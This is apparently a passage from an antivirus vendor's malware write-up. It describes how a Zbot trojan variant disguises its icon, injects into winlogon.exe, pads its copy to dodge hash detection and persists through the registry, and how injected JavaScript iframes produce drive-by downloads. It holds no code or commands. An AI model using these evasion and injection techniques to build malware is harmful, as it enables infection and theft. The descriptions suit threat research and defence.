The malware
comes with a common trick for the users: it has a different icon then a usual
executable icon. In this case it’s a *.chm file icon (Microsoft Compiled HTML
Help File). We’ve also seen usage of Microsoft Excel and standard directory
icons used by Zbot.
As for most
Zbots, its infection vector is email spam.
This particular
version of Zbot is actually nothing else but a repacked version of Trojan.Spy.ZBot.UI.
It injects code in winlogon.exe allowing it to create files and connect
to the Internet undetected. Making use of this, it creates a copy of itself
into %windir%system32sdra64.exe, adding garbage to the executable so
it has a different size and md5 hash, a rather shy attempt of av-evasion. It
also creates a folder called lowsec in the same folder in which it will
write 3 files containing encrypted data: local.ds, user.ds and user.ds.lll
In order to
run at every system startup the Trojan makes changes to certain registry
entries. I also marks it’s presence on the computer by creating the following
mutex: __SYSTEM__64AD0625__
This
generic detection made by BitDefender stands for JavaScripts which try to
exploit vulnerabilities outdated browsers or third party browser plugins like
ActiveX controls for PDF viewing, Flash playback and others.
The idea of
the script is to load malicious pages into beforehand specifically crafted
pages for this purpose or initially clean but later attacked websites which
have been modified to act as a medium.
The
mechanics behind the attack is to inject JavaScript code into the clean page,
which will have as a result the creation of a special iframe, which is
invisible to the eye, but will practically load another page behind the page
the victim is visiting at the moment.
That other
page will most certainly contain several exploits for the above mentioned
plugins and whichever succeeds will download malware to the affected PC without
the users notice or consent. This type of download is called drive-by-download
and the payload depends on the page that has been loaded by this JavaScript’s
code into the clean site.
Information
in this article is available courtesy of BitDefender virus researchers: Lutas
Andrei Vlad and Marius Vanta
tags
November 14, 2024
September 06, 2024